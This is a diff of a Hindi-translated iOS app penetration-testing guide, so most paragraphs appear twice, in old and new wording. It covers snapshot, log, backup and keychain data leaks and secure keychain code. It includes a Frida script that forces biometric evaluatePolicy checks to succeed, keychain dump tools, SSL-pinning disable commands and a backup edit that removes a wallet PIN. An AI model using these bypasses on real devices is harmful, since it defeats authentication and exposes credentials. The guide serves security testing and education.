2. यदि आपको कुकीज़ के लाभ का उपयोग करने की आवश्यकता नहीं है, तो URLSession की [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) कॉन्फ़िगरेशन प्रॉपर्टी का उपयोग करना सिफारिश की जाती है, जो कुकीज़ और कैश को सहेजने को बंद कर देगी।
[Apple documentation](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral):
[Apple दस्तावेज़](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral):
`An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesnt store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.`
@ -528,11 +528,11 @@ iOS ऐप्स की कुकीज़ को प्रत्येक ऐ
### Snapshots
जब भी आप होम बटन दबाते हैं, iOS **वर्तमान स्क्रीन का स्नैपशॉट लेता है** ताकि एप्लिकेशन में संक्रमण को बहुत सुचारू तरीके से किया जा सके। हालाँकि, यदि वर्तमान स्क्रीन में **संवेदनशील** **डेटा** मौजूद है, तो यह **छवि** में **सहेजा** जाएगा (जो **रीबूट** के **दौरान** **बनाए** **रता** है)। ये स्नैपशॉट हैं जिन तक आप ऐप्स के बीच स्विच करने के लिए होम स्क्रीन पर डबल टैप करके भी पहुँच सकते हैं।
जब भी आप होम बटन दबाते हैं, iOS **वर्तमान स्क्रीन का स्नैपशॉट लेता है** ताकि एप्लिकेशन में संक्रमण को बहुत सुचारू तरीके से किया जा सके। हालाँकि, यदि वर्तमान स्क्रीन में **संवेदनशील** **डेटा** मौजूद है, तो यह **छवि** में **सहेजा** जाएगा (जो **रीबूट** के **दौरान** **बनाए** **रता** है)। ये स्नैपशॉट हैं जिन तक आप ऐप्स के बीच स्विच करने के लिए होम स्क्रीन पर डबल टैप करके भी पहुँच सकते हैं।
जब तक iPhone जेलब्रोक नहीं है, **हमलावर** को इन स्क्रीनशॉट्स को देखने के लिए **डिवाइस** **अनब्लॉक** **एक्सेस** की आवश्यकता होती है। डिफ़ॉल्ट रूप से अंतिम स्नैपशॉट ऐप के सैंडबॉक्स में `Library/Caches/Snapshots/` या `Library/SplashBoard/Snapshots` फ़ोल्डर में स्टोर किया जाता है (विश्वसनीय कंप्यूटर iOX 7.0 से फ़ाइल सिस्टम तक पहुँच नहीं सकते)।
जब तक iPhone जेलब्रोक नहीं है, **हमलावर** को इन स्क्रीनशॉट्स को देखने के लिए **डिवाइस** **अनब्लॉक** **करने** की **आवश्यकता** है। डिफ़ॉल्ट रूप से अंतिम स्नैपशॉट ऐप के सैंडबॉक्स में `Library/Caches/Snapshots/` या `Library/SplashBoard/Snapshots` फ़ोल्डर में स्टोर किया जाता है (विश्वसनीय कंप्यूटर iOX 7.0 से फ़ाइल सिस्टम तक पहुँच नहीं सकते)।
इस बुरे व्यवहार को रोकने का एक तरीका यह है कि स्नैपशॉट लेने से पहले एक खाली स्क्रीन डालें या संवेदनशील डेटा हटा दें `ApplicationDidEnterBackground()` फ़ंक्शन का उपयोग करके।
इस बुरे व्यवहार को रोकने का एक तरीका यह है कि स्नैपशॉट लेने से पहले एक खाली स्क्रीन डालें या संवेदनशील डेटा को हटा दें `ApplicationDidEnterBackground()` फ़ंक्शन का उपयोग करके।
नीचे एक नमूना सुधार विधि है जो एक डिफ़ॉल्ट स्क्रीनशॉट सेट करेगी।
@ -570,7 +570,7 @@ self.backgroundImage.bounds = UIScreen.mainScreen.bounds;
### Keychain
iOS की कीचेन तक पहुँचने और प्रबंधित करने के लिए, [**Keychain-Dumper**](https://github.com/ptoomey3/Keychain-Dumper) जैसे उपकरण उपलब्ध हैं, जो जेलब्रोकन उपकरणों के लिए उपयुक्त हैं। इसके अतिरिक्त, [**Objection**](https://github.com/sensepost/objection) समान उद्देश्यों के लिए `ios keychain dump` कमांड प्रदान करता है।
iOS की कीचेन तक पहुँचने और प्रबंधित करने के लिए, [**Keychain-Dumper**](https://github.com/ptoomey3/Keychain-Dumper) जैसे उपकरण उपलब्ध हैं, जो जेलब्रोकन डिवाइस के लिए उपयुक्त हैं। इसके अतिरिक्त, [**Objection**](https://github.com/sensepost/objection) समान उद्देश्यों के लिए `ios keychain dump` कमांड प्रदान करता है।
#### **Credentials को स्टोर करना**
@ -584,7 +584,7 @@ credential = [NSURLCredential credentialWithUser:username password:password pers
## **कस्टम कीबोर्ड और कीबोर्ड कैश**
iOS 8.0 से आगे, उपयोगकर्ता कस्टम कीबोर्ड एक्सटेंशन स्थापित कर सकते हैं, जिन्हें **Settings > General > Keyboard > Keyboards** के तहत प्रबंधित किया जा सकता है। जबकि ये कीबोर्ड विस्तारित कार्यक्षमता प्रदान करते हैं, वे कीस्ट्रोक लॉगिंग और डेटा को बाहरी सर्वरों पर भेजने का जोखिम पैदा करते हैं, हालांकि उपयोगकर्ताओं को नेटवर्क एक्सेस की आवश्यकता वाले कीबोर्ड के बारे में सूचित किया जाता है। ऐप्स को संवेदनशील जानकारी के लिए कस्टम कीबोर्ड के उपयोग को प्रतिबंधित करना चाहिए।
iOS 8.0 से आगे, उपयोगकर्ता कस्टम कीबोर्ड एक्सटेंशन स्थापित कर सकते हैं, जिन्हें **Settings > General > Keyboard > Keyboards** के तहत प्रबंधित किया जा सकता है। जबकि ये कीबोर्ड विस्तारित कार्यक्षमता प्रदान करते हैं, वे कीस्ट्रोक लॉगिंग और डेटा को बाहरी सर्वरों पर भेजने का जोखिम उठाते हैं, हालांकि उपयोगकर्ताओं को नेटवर्क एक्सेस की आवश्यकता वाले कीबोर्ड के बारे में सूचित किया जाता है। ऐप्स को संवेदनशील जानकारी के लिए कस्टम कीबोर्ड के उपयोग को प्रतिबंधित करना चाहिए।
**सुरक्षा सिफारिशें:**
@ -608,11 +608,11 @@ textField.autocorrectionType = UITextAutocorrectionTypeNo;
कोड को डिबग करने में अक्सर **लॉगिंग** का उपयोग किया जाता है। इसमें एक जोखिम होता है क्योंकि **लॉग्स में संवेदनशील जानकारी हो सकती है**। पहले, iOS 6 और इससे पहले के संस्करणों में, लॉग सभी ऐप्स के लिए सुलभ थे, जिससे संवेदनशील डेटा लीक होने का जोखिम था। **अब, ऐप्स को केवल अपने लॉग्स तक पहुंचने की अनुमति है**
इन प्रतिबंधों के बावजूद, **एक हमलावर जिसे अनलॉक किए गए डिवाइस तक भौतिक पहुंच है**, इसे एक कंप्यूटर से डिवाइस को कनेक्ट करके और **लॉग्स को पढ़कर** भुनाने में सक्षम हो सकता है। यह ध्यान रखना महत्वपूर्ण है कि ऐप के अनइंस्टॉलेशन के बाद भी लॉग डिस्क पर बने रहते हैं।
इन प्रतिबंधों के बावजूद, एक **हमलावर जिसे अनलॉक किए गए डिवाइस तक भौतिक पहुंच है**, इसे एक कंप्यूटर से कनेक्ट करके और **लॉग्स को पढ़कर** भुनाने में सक्षम हो सकता है। यह ध्यान रखना महत्वपूर्ण है कि ऐप के अनइंस्टॉलेशन के बाद भी लॉग डिस्क पर बने रहते हैं।
जोखिमों को कम करने के लिए, यह सलाह दी जाती है कि **ऐप के साथ पूरी तरह से इंटरैक्ट करें**, इसके सभी कार्यात्मकताओं और इनपुट्स का पता लगाएं ताकि यह सुनिश्चित हो सके कि कोई संवेदनशील जानकारी अनजाने में लॉग नहीं की जा रही है।
जोखिमों को कम करने के लिए, सलाह दी जाती है कि **ऐप के साथ पूरी तरह से इंटरैक्ट करें**, इसके सभी कार्यात्मकताओं और इनपुट्स का अन्वेषण करें ताकि यह सुनिश्चित हो सके कि कोई संवेदनशील जानकारी अनजाने में लॉग नहीं की जा रही है।
जब ऐप के स्रोत कोड की समीक्षा करते हैं संभावित लीक के लिए, तो **पूर्वनिर्धारित** और **कस्टम लॉगिंग स्टेटमेंट्स** की तलाश करें, जैसे कि `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` के लिए अंतर्निहित कार्यों के लिए, और कस्टम कार्यान्वयन के लिए `Logging` या `Logfile` का कोई उल्लेख।
ऐप के स्रोत कोड की समीक्षा करते समय संभावित लीक के लिए, `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` जैसे कीवर्ड का उपयोग करते हुए **पूर्वनिर्धारित** और **कस्टम लॉगिंग स्टेटमेंट्स** की तलाश करें, और कस्टम कार्यान्वयन के लिए `Logging` या `Logfile` का कोई उल्लेख करें
### **सिस्टम लॉग्स की निगरानी**
@ -634,15 +634,15 @@ idevicesyslog -u <id> (| grep <app>) # To capture the device logs
```bash
iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
```
लॉग गतिविधियों को देखने के लिए आदेशों के बाद, जो समस्याओं का निदान करने या लॉग में संभावित डेटा लीक की पहचान करने के लिए अमूल्य हो सकते हैं
लॉग गतिविधियों को देखने के लिए कमांड का पालन किया गया, जो समस्याओं का निदान करने या लॉग में संभावित डेटा लीक की पहचान करने के लिए अमूल्य हो सकता है
## बैकअप
**ऑटो-बैकअप सुविधाएँ** iOS में एकीकृत हैं, जो iTunes (macOS Catalina तक), Finder (macOS Catalina के बाद) या iCloud के माध्यम से डिवाइस डेटा की प्रतियों के निर्माण को सुविधाजनक बनाती हैं। ये बैकअप लगभग सभी डिवाइस डेटा को शामिल करते हैं, जिसमें अत्यधिक संवेदनशील तत्व जैसे Apple Pay विवरण और Touch ID कॉन्फ़िगरेशन शामिल नहीं हैं
**ऑटो-बैकअप सुविधाएँ** iOS में एकीकृत हैं, जो iTunes (macOS Catalina तक), Finder (macOS Catalina के बाद) या iCloud के माध्यम से डिवाइस डेटा की प्रतियों के निर्माण की सुविधा प्रदान करती हैं। ये बैकअप लगभग सभी डिवाइस डेटा को शामिल करते हैं, अत्यधिक संवेदनशील तत्वों जैसे Apple Pay विवरण और Touch ID कॉन्फ़िगरेशन को छोड़कर
### सुरक्षा जोखिम
**इंस्टॉल किए गए ऐप्स और उनके डेटा** का बैकअप में शामिल होना संभावित **डेटा लीक** और **बैकअप संशोधनों के कारण ऐप कार्यक्षमता में परिवर्तन** का जोखिम उठाता है। इन जोखिमों को कम करने के लिए सलाह दी जाती है कि **किसी भी ऐप के निर्देशिका या उसके उपनिर्देशिकाओं में संवेदनशील जानकारी को प्लेनटेक्स्ट में न रखें**।
**इंस्टॉल किए गए ऐप्स और उनके डेटा** का बैकअप में शामिल होना संभावित **डेटा लीक** और **बैकअप संशोधनों के कारण ऐप कार्यक्षमता में परिवर्तन** का जोखिम उठाता है। इन जोखिमों को कम करने के लिए सलाह दी जाती है कि **किसी भी ऐप के निर्देशिका या उसके उपनिर्देशिकाओं में संवेदनशील जानकारी को ्पष्ट पाठ में न रखें**।
### बैकअप से फ़ाइलें बाहर करना
@ -669,11 +669,11 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
### ऐप व्यवहार को संशोधित करना
बैकअप संशोधनों के माध्यम से ऐप व्यवहार को बदलने का एक उदाहरण [Bither bitcoin wallet app](https://github.com/bither/bither-ios) में प्रदर्शित किया गया है, जहा UI लॉक PIN `net.bither.plist` में **pin_code** कुंजी के तहत संग्रहीत होता है। plist से इस कुंजी को हटाने और बैकअप को पुनर्स्थापित करने से PIN आवश्यकता समाप्त हो जाती है, जिससे बिना किसी प्रतिबंध के पहुँच मिलती है।
बैकअप संशोधनों के माध्यम से ऐप व्यवहार को बदलने का एक उदाहरण [Bither bitcoin wallet app](https://github.com/bither/bither-ios) में प्रदर्शित किया गया है, जहा UI लॉक PIN `net.bither.plist` में **pin_code** कुंजी के तहत संग्रहीत होता है। plist से इस कुंजी को हटाने और बैकअप को पुनर्स्थापित करने से PIN आवश्यकता समाप्त हो जाती है, जिससे बिना किसी प्रतिबंध के पहुँच मिलती है।
## संवेदनशील डेटा के लिए मेमोरी परीक्षण पर सारांश
जब किसी एप्लिकेशन की मेमोरी में संग्रहीत संवेदनशील जानकारी से निपटते हैं, तो इस डेटा के एक्सपोजर समय को सीमित करना महत्वपूर्ण है। मेमोरी सामग्री की जांच करने के लिए दो प्रमुख दृष्टिकोण हैं: **मेमोरी डंप बनाना** और **वास्तविक समय में मेमोरी का विश्लेषण करना**। दोनों विधियों में उनकी चुनौतियाँ होती हैं, जिसमें डंप प्रक्रिया या विश्लेषण के दौरान महत्वपूर्ण डेटा को चूकने की संभावना शामिल है।
जब किसी एप्लिकेशन की मेमोरी में संग्रहीत संवेदनशील जानकारी से निपटते हैं, तो इस डेटा के एक्सपोजर समय को सीमित करना महत्वपूर्ण है। मेमोरी सामग्री की जांच करने के लिए दो प्रमुख दृष्टिकोण हैं: **मेमोरी डंप बनाना** और **वास्तविक समय में मेमोरी का विश्लेषण करना**। दोनों विधियों में उनकी चुनौतियाँ होती हैं, जिसमें डंप प्रक्रिया या विश्लेषण के दौरान महत्वपूर्ण डेटा को चूकने की संभावना शामिल है।
## **मेमोरी डंप को पुनः प्राप्त करना और विश्लेषण करना**
@ -704,7 +704,7 @@ $ r2 frida://usb//<name_of_your_app>
### खराब कुंजी प्रबंधन प्रक्रियाएँ
कुछ डेवलपर्स संवेदनशील डेटा को स्थानीय स्टोरेज में सहेजते हैं और इसे कोड में हार्डकोडेड/पूर्वानुमानित कुंजी के साथ एन्क्रिप्ट करते हैं। ऐसा नहीं करना चाहिए क्योंकि कुछ रिवर्सिंग हमलावरों को गोपनीय जानकारी निकालने की अनुमति दे सकती है।
कुछ डेवलपर्स संवेदनशील डेटा को स्थानीय संग्रहण में सहेजते हैं और इसे कोड में हार्डकोडेड/पूर्वानुमानित कुंजी के साथ एन्क्रिप्ट करते हैं। ऐसा नहीं करना चाहिए क्योंकि कुछ रिवर्सिंग हमलावरों को गोपनीय जानकारी निकालने की अनुमति दे सकती है।
### असुरक्षित और/या अप्रचलित एल्गोरिदम का उपयोग
@ -714,7 +714,7 @@ $ r2 frida://usb//<name_of_your_app>
मुख्य जांच करने के लिए यह है कि क्या आप कोड में **हार्डकोडेड** पासवर्ड/गुप्त जानकारी पा सकते हैं, या क्या वे **पूर्वानुमानित** हैं, और क्या कोड किसी प्रकार के **कमजोर** **क्रिप्टोग्राफी** एल्गोरिदम का उपयोग कर रहा है।
यह जानना दिलचस्प है कि आप **objection** का उपयोग करके कुछ **क्रिप्टो** **लाइब्रेरीज़** को स्वचालित रूप से **निगरानी** कर सकते हैं:
यह जानना दिलचस्प है कि आप **ऑब्जेक्शन** का उपयोग करके कुछ **क्रिप्टो** **लाइब्रेरीज़** को स्वचालित रूप से **निगरानी** कर सकते हैं:
```swift
ios monitor crypt
```
@ -722,17 +722,17 @@ ios monitor crypt
## स्थानीय प्रमाणीकरण
**स्थानीय प्रमाणीकरण** एक महत्वपूर्ण भूमिका निभाता है, विशेष रूप से जब यह दूरस्थ एंडपॉइंट पर क्रिप्टोग्राफिक विधियों के माध्यम से पहुंच की सुरक्षा की बात आती है। यहाँ का सार यह है कि उचित कार्यान्वयन के बिना, स्थानीय प्रमाणीकरण तंत्र को दरकिनार किया जा सकता है।
**स्थानीय प्रमाणीकरण** एक महत्वपूर्ण भूमिका निभाता है, विशेष रूप से जब यह दूरस्थ अंत बिंदु पर क्रिप्टोग्राफिक विधियों के माध्यम से पहुंच की सुरक्षा की बात आती है। यहाँ का सार यह है कि उचित कार्यान्वयन के बिना, स्थानीय प्रमाणीकरण तंत्र को दरकिनार किया जा सकता है।
Apple का [**स्थानीय प्रमाणीकरण ढांचा**](https://developer.apple.com/documentation/localauthentication) और [**कीचेन**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) उपयोगकर्ता प्रमाणीकरण संवादों को सुविधाजनक बनाने और क्रमशः गुप्त डेटा को सुरक्षित रूप से संभालने के लिए मजबूत APIs प्रदान करते हैं। Secure Enclave Touch ID के लिए फिंगरप्रिंट ID को सुरक्षित करता है, जबकि Face ID चेहरे की पहचान पर निर्भर करता है बिना जैविक डेटा से समझौता किए।
Apple का [**स्थानीय प्रमाणीकरण ढांचा**](https://developer.apple.com/documentation/localauthentication) और [**कीचेन**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) उपयोगकर्ता प्रमाणीकरण संवादों को सुविधाजनक बनाने और गुप्त डेटा को सुरक्षित रूप से संभालने के लिए मजबूत APIs प्रदान करते हैं। Secure Enclave Touch ID के लिए फिंगरप्रिंट ID को सुरक्षित करता है, जबकि Face ID चेहरे की पहचान पर निर्भर करता है बिना जैविक डेटा से समझौता किए।
Touch ID/Face ID को एकीकृत करने के लिए, डेवलपर्स के पास दो API विकल्प हैं:
- **`LocalAuthentication.framework`** उच्च-स्तरीय उपयोगकर्ता प्रमाणीकरण के लिए बिना जैविक डेटा तक पहुंच के।
- **`Security.framework`** कम-स्तरीय कीचेन सेवाओं की पहुंच के लिए, जैविक प्रमाणीकरण के साथ गुप्त डेटा को सुरक्षित करना। विभिन्न [ओपन-सोर्स रैपर](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) कीचेन पहुंच को सरल बनाते हैं।
- **`Security.framework`** निम्न-स्तरीय कीचेन सेवाओं की पहुंच के लिए, जैविक प्रमाणीकरण के साथ गुप्त डेटा को सुरक्षित करना। विभिन्न [ओपन-सोर्स रैपर](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) कीचेन पहुंच को सरल बनाते हैं।
> [!CAUTION]
> हालाँकि, दोनों `LocalAuthentication.framework` और `Security.framework` कमजोरियों को प्रस्तुत करते हैं, क्योंकि वे मुख्य रूप से बूलियन मान लौटाते हैं बिना प्रमाणीकरण प्रक्रियाओं के लिए डेटा भेजे, जिससे उन्हें दरकिनार करने के लिए संवेदनशील बनाते हैं (देखें [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM))।
> हालाँकि, दोनों `LocalAuthentication.framework` और `Security.framework` कमजोरियों को प्रस्तुत करते हैं, क्योंकि वे मुख्य रूप से प्रमाणीकरण प्रक्रियाओं के लिए डेटा को संचारित किए बिना बूलियन मान लौटाते हैं, जिससे उन्हें दरकिनार करने के लिए संवेदनशील बनाते हैं (देखें [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM))।
### स्थानीय प्रमाणीकरण को लागू करना
@ -749,7 +749,7 @@ iOS ऐप्स में **स्थानीय प्रमाणीकर
कीचेन `SecAccessControl` विशेषता के साथ आइटम सेट करने की क्षमता प्रदान करता है, जो उपयोगकर्ता के सफल प्रमाणीकरण तक आइटम तक पहुंच को प्रतिबंधित करता है। यह सुविधा सुरक्षा बढ़ाने के लिए महत्वपूर्ण है।
नीचे Swift और Objective-C में कोड उदाहरण दिए गए हैं जो दिखाते हैं कि कैसे कीचेन में एक स्ट्रिंग को सुरक्षित रूप से सहेजें और पुनः प्राप्त करें, इन सुरक्षा सुविधाओं का लाभ उठाते हुए। उदाहरण विशेष रूप से यह दिखाते हैं कि कैसे एक्सेस नियंत्रण सेट करें ताकि Touch ID प्रमाणीकरण की आवश्यकता हो और सुनिश्चित करें कि डेटा केवल उसी डिवाइस पर उपलब्ध हो जिस पर इसे सेट किया गया था, इस शर्त के तहत कि एक डिवाइस पासकोड कॉन्फ़िगर किया गया है।
नीचे Swift और Objective-C में कोड उदाहरण दिए गए हैं जो दिखाते हैं कि कैसे कीचेन में एक स्ट्रिंग को सुरक्षित रूप से सहेजें और पुनः प्राप्त करें, इन सुरक्षा सुविधाओं का लाभ उठाते हुए। उदाहरण विशेष रूप से दिखाते हैं कि कैसे एक्सेस नियंत्रण स्थापित किया जाए ताकि Touch ID प्रमाणीकरण की आवश्यकता हो और सुनिश्चित करें कि डेटा केवल उसी डिवाइस पर उपलब्ध हो जिस पर इसे सेट किया गया था, इस शर्त के तहत कि एक डिवाइस पासकोड कॉन्फ़िगर किया गया है।
{{#tabs}}
{{#tab name="Swift"}}
@ -822,7 +822,7 @@ if (status == noErr) {
{{#endtab}}
{{#endtabs}}
अब हम कीचेन से सहेजे गए आइटम क अनुरोध कर सकते हैं। कीचेन सेवाएँ उपयोगकर्ता को प्रमाणीकरण संवाद प्रस्तुत करेंगी और यह निर्भर करेगा कि क्या एक उपयुक्त फिंगरप्रिंट प्रदान किया गया था या नहीं, डेटा या nil लौटाएंगी।
अब हम कीचेन से सहेजे गए आइटम क अनुरोध कर सकते हैं। कीचेन सेवाएँ उपयोगकर्ता को प्रमाणीकरण संवाद प्रस्तुत करेंगी और उपयुक्त फिंगरप्रिंट प्रदान किया गया या नहीं, इसके आधार पर डेटा या nil लौटाएँगी।
{{#tabs}}
{{#tab name="Swift"}}
@ -880,7 +880,7 @@ NSLog(@"Something went wrong");
```bash
$ otool -L <AppName>.app/<AppName>
```
यदि `LocalAuthentication.framework` किसी ऐप में उपयोग किया जाता है, तो आउटपुट में निम्नलिखित दोनों पंक्तियाँ शामिल होंगी (याद रखें कि `LocalAuthentication.framework` के पीछे `Security.framework` का उपयोग होता है):
यदि `LocalAuthentication.framework` किसी ऐप में उपयोग किया गया है, तो आउटपुट में निम्नलिखित दोनों पंक्तियाँ शामिल होंगी (याद रखें कि `LocalAuthentication.framework` के पीछे `Security.framework` का उपयोग होता है):
```bash
/System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication
/System/Library/Frameworks/Security.framework/Security
@ -936,7 +936,7 @@ dispatch_async(dispatch_get_main_queue(), ^{
```
स्थानीय प्रमाणीकरण के **bypass** को प्राप्त करने के लिए, एक Frida स्क्रिप्ट लिखी गई है। यह स्क्रिप्ट **evaluatePolicy** जांच को लक्षित करती है, इसके कॉलबैक को इंटरसेप्ट करते हुए यह सुनिश्चित करती है कि यह **success=1** लौटाए। कॉलबैक के व्यवहार को बदलकर, प्रमाणीकरण जांच को प्रभावी रूप से बायपास किया जाता है।
नीचे दी गई स्क्रिप्ट **evaluatePolicy** विधि के परिणाम को संशोधित करने के लिए इंजेक्ट की गई है। यह कॉलबैक के परिणाम को हमेशा सफलता को इंगित करने के लिए बदल देती है।
नीचे दी गई स्क्रिप्ट **evaluatePolicy** विधि के परिणाम को संशोधित करने के लिए इंजेक्ट की गई है। यह हमेशा सफलता को इंगित करने के लिए कॉलबैक के परिणाम को बदलती है।
```swift
// from https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/
if(ObjC.available) {
@ -1023,19 +1023,19 @@ TLS प्रमाणपत्र को मान्य करने में
### प्रमाणपत्र पिनिंग
यदि एक एप्लिकेशन सही तरीके से SSL पिनिंग का उपयोग कर रहा है, तो एप्लिकेशन केवल तभी काम करेगा जब प्रमाणपत्र वही हो जो अपेक्षित हो। जब एक एप्लिकेशन का परीक्षण करते समय **यह एक समस्या हो सकती है क्योंकि Burp अपना प्रमाणपत्र प्रदान करेगा।**\
एक जेलब्रोकन डिवाइस के अंदर इस सुरक्षा को बायपास करने के लिए, आप एप्लिकेशन [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) स्थापित कर सकते हैं या [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) स्थापित कर सकते हैं।
एक जेलब्रोकन डिवाइस के अंदर इस सुरक्षा को बायपास करने के लिए, आप [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) एप्लिकेशन इंस्टॉल कर सकते हैं या [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) इंस्टॉल कर सकते हैं।
आप **objection's** `ios sslpinning disable` का भी उपयोग कर सकते हैं।
## विविध
- **`/System/Library`** में आप फोन में सिस्टम एप्लिकेशनों द्वारा उपयोग किए जाने वाले फ्रेमवर्क पा सकते हैं।
- App Store से उपयोगकर्ता द्वारा स्थापित एप्लिकेशन **`/User/Applications`** के अंदर स्थित होते हैं।
- और **`/User/Library`** में उपयोगकर्ता स्तर क एप्लिकेशनों द्वारा सहेजे गए डेटा होते हैं।
- App Store से उपयोगकर्ता द्वारा इंस्टॉल की गई एप्लिकेशन **`/User/Applications`** के अंदर स्थित हैं।
- और **`/User/Library`** में उपयोगकर्ता स्तर क एप्लिकेशनों द्वारा सहेजे गए डेटा होते हैं।
- आप **`/User/Library/Notes/notes.sqlite`** तक पहुँच सकते हैं ताकि एप्लिकेशन के अंदर सहेजे गए नोट्स को पढ़ सकें।
- एक स्थापित एप्लिकेशन के फ़ोल्डर के अंदर (**`/User/Applications/<APP ID>/`**) आप कुछ दिलचस्प फ़ाइलें पा सकते हैं:
- एक इंस्टॉल की गई एप्लिकेशन के फ़ोल्डर के अंदर (**`/User/Applications/<APP ID>/`**) आप कुछ दिलचस्प फ़ाइलें पा सकते हैं:
- **`iTunesArtwork`**: ऐप द्वारा उपयोग किया जाने वाला आइकन
- **`iTunesMetadata.plist`**: App Store में उपयोग किए जाने वाले ऐप की जानकारी
- **`iTunesMetadata.plist`**: App Store में उपयोग की जाने वाली ऐप की जानकारी
- **`/Library/*`**: प्राथमिकताएँ और कैश शामिल हैं। **`/Library/Cache/Snapshots/*`** में आप एप्लिकेशन को बैकग्राउंड में भेजने से पहले किए गए स्नैपशॉट को पा सकते हैं।
### हॉट पैचिंग/अनिवार्य अपडेटिंग
@ -1046,9 +1046,9 @@ TLS प्रमाणपत्र को मान्य करने में
### तृतीय पक्ष
**3rd पार्टी SDKs** के साथ एक महत्वपूर्ण चुनौती उनके कार्यात्मकताओं पर **सूक्ष्म नियंत्रण की कमी** है। डेवलपर्स के पास एक विकल्प होता है: या तो SDK को एकीकृत करें और इसकी सभी सुविधाओं को स्वीकार करें, जिसमें संभावित सुरक्षा कमजोरियाँ और गोपनीयता संबंधी चिंताएँ शामिल हैं, या इसके लाभों को पूरी तरह से छोड़ दें। अक्सर, डेवलपर्स इन SDKs के भीतर कमजोरियों को स्वयं पैच करने में असमर्थ होते हैं। इसके अलावा, जैसे-जैसे SDKs समुदाय में विश्वास प्राप्त करते हैं, कुछ में मैलवेयर शामिल हो सकता है।
**3rd पार्टी SDKs** के साथ एक महत्वपूर्ण चुनौती उनके कार्यात्मकताओं पर **सूक्ष्म नियंत्रण की कमी** है। डेवलपर्स के पास एक विकल्प होता है: या तो SDK को एकीकृत करें और इसकी सभी सुविधाओं को स्वीकार करें, जिसमें संभावित सुरक्षा कमजोरियाँ और गोपनीयता संबंधी चिंताएँ शामिल हैं, या इसके लाभों को पूरी तरह से छोड़ दें। अक्सर, डेवलपर्स इन SDKs में कमजोरियों को स्वयं पैच करने में असमर्थ होते हैं। इसके अलावा, जैसे-जैसे SDKs समुदाय में विश्वास प्राप्त करते हैं, कुछ में मैलवेयर शामिल हो सकता है।
तीसरे पक्ष के SDKs द्वारा प्रदान की जाने वाली सेवाओं में उपयोगकर्ता व्यवहार ट्रैकिंग, विज्ञापन प्रदर्शन, या उपयोगकर्ता अनुभव में सुधार शामिल हो सकते हैं। हालाँकि, यह एक जोखिम प्रस्तुत करता है क्योंकि डेवलपर्स को इन पुस्तकालयों द्वारा निष्पादित कोड के बारे में पूरी जानकारी नहीं हो सकती है, जिससे संभावित गोपनीयता और सुरक्षा जोखिम हो सकते हैं। यह महत्वपूर्ण है कि तीसरे पक्ष की सेवाओं के साथ साझा की गई जानकारी को आवश्यकतानुसार सीमित किया जाए और यह सुनिश्चित किया जाए कि कोई संवेदनशील डेटा उजागर न हो।
तीसरे पक्ष के SDKs द्वारा प्रदान की जाने वाली सेवाओं में उपयोगकर्ता व्यवहार ट्रैकिंग, विज्ञापन प्रदर्शन, या उपयोगकर्ता अनुभव में सुधार शामिल हो सकते हैं। हालाँकि, यह एक जोखिम प्रस्तुत करता है क्योंकि डेवलपर्स इन पुस्तकालयों द्वारा निष्पादित कोड के बारे में पूरी तरह से अवगत नहीं हो सकते हैं, जिससे संभावित गोपनीयता और सुरक्षा जोखिम हो सकते हैं। यह महत्वपूर्ण है कि तीसरे पक्ष की सेवाओं के साथ साझा की गई जानकारी को आवश्यकतानुसार सीमित किया जाए और यह सुनिश्चित किया जाए कि कोई संवेदनशील डेटा उजागर न हो।
तीसरे पक्ष की सेवाओं का कार्यान्वयन आमतौर पर दो रूपों में आता है: एक स्वतंत्र पुस्तकालय या एक पूर्ण SDK। उपयोगकर्ता की गोपनीयता की रक्षा के लिए, इन सेवाओं के साथ साझा किए गए किसी भी डेटा को **गुमनाम** किया जाना चाहिए ताकि व्यक्तिगत पहचान योग्य जानकारी (PII) का खुलासा न हो।
@ -1074,7 +1074,7 @@ otool -L <application_path>
- [https://mas.owasp.org/MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064](https://mas.owasp.org/MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064)
- [https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc](https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc)
- [https://mas.owasp.org/MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054](https://mas.owasp.org/MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054)
- [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS मुफ्त कोर्स([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/))
- [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS मुफ्त पाठ्यक्रम([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/))
- [https://www.sans.org/reading-room/whitepapers/testing/ipwn-apps-pentesting-ios-applications-34577](https://www.sans.org/reading-room/whitepapers/testing/ipwn-apps-pentesting-ios-applications-34577)
